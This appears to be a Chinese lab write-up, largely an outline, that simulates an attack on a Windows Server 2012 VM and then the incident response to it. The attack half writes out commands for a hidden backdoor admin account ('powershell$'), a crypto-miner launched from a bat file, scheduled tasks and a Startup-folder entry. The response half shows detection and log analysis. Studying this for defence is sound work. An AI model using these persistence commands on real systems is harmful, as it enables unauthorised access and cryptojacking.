文章目录
整体流程:
一、Vmware搭建winserver2012
1、选择镜像新建虚拟机
2、设置虚拟机名称配置等信息
3、设置虚拟机网络及磁盘等信息
4、设置磁盘信息
5、开始安装
6、安装vmtools
7、设置密码
8、开启远程桌面
二、攻击机进行攻击
1、环境介绍
2、攻击机暴力破解靶机密码
administrator/admin@123
3、使用得到的账号密码远程登录靶机
4、创建隐藏账户powershell$并加至最高权限
1.创建隐藏账户
net user powershell$ admin@123/add
net localgroup administrators powershell$ /add
net user
2.用户隐藏成功
3.加入管理组
net localgroup administrators powershell$ /add
4.添加远程桌面权限
5、上传wakuangdb
6、安装java环境
7、写入启动恶意文件的bat
@echo of f
start C: \Users \Admini strator \Documents \wkbd\javs. exe
8、写入计划任务
1.每五分钟执行javs一次
schtasks /create /tn updater /tr "C:\Users\Administrator\Documents\wkbd\javs.exe" /sc minute /mo 5
2.每三分钟执行javs启动程序一次
schtasks /create /tn updater2 /tr "C: \Users' \Admi ni strator\Documents \wkbd\执行javs. bat" /sc minute /mo 3
9、写入启动项
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
三、应急响应处理异常
1、事件背景
2、简单分析
3、排查服务器是否感染挖矿病毒
https://s.threatbook.com/report/url/0c59832767b70c545cce4caa9c3fd22e
tasklist
C:\Users\Administrator\Documents\wkbd\javs.exe
https://s.threatbook.com
4、结束进程
5、排查计划任务
6、查看进程
7、排查启动项
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
8、排查计划任务
9、查看服务
10、发现隐藏账户
11、排查网络连接
netstat -ano
四、应急响应溯源
1、查看计划任务
2、提取安全日志
[ 应急响应基础篇 ] evtx提取安全日志 & 事件查看器提取安全日志
1.evtx提取安全日志
2.事件查看器提取安全日志
3、分析安全日志
4、事件复原
五、相关资源
1、 [ 应急响应篇 ] 日志分析工具Log Parser配合login工具使用详解(附安装教程)
2、 [ 应急响应基础篇 ] evtx提取安全日志 & 事件查看器提取安全日志
3、 [ 应急响应基础篇 ] windows日志分析详解–windows日志分析介绍–Windows事件类型介绍–提取windows日志–windows日志分析工具–windows日志分析实例
4、 [ 应急响应基础篇 ] 使用 Process Explorer 进程分析工具分析系统进程(附Process Explorer安装教程)
5、 [ 红队知识库 ] 一些常用bat文件集合
6、 [ 应急响应基础篇 ] 解决远程登录权限不足的问题(后门账号添加远程桌面权限)
7、 [ 应急响应 ]服务器(电脑)受到攻击该如何处理?(一)
8、 [ 应急响应基础篇 ] 使用 Autoruns 启动项分析工具分析启动项(附Autoruns安装教程)
9、 [ 问题解决篇 ] 解决windows虚拟机安装vmtools报错-winserver2012安装vmtools及安装KB2919355补丁 (附离线工具)
10、 [ 问题解决篇 ] 解决远程桌面安全登录框的问题
11、 [ windows权限维持 ] 利用永恒之蓝(MS17-010)漏洞取靶机权限并创建后门账户
12、 [ 环境搭建篇 ] 安装 java 环境并配置环境变量(附 JDK1.8 安装包)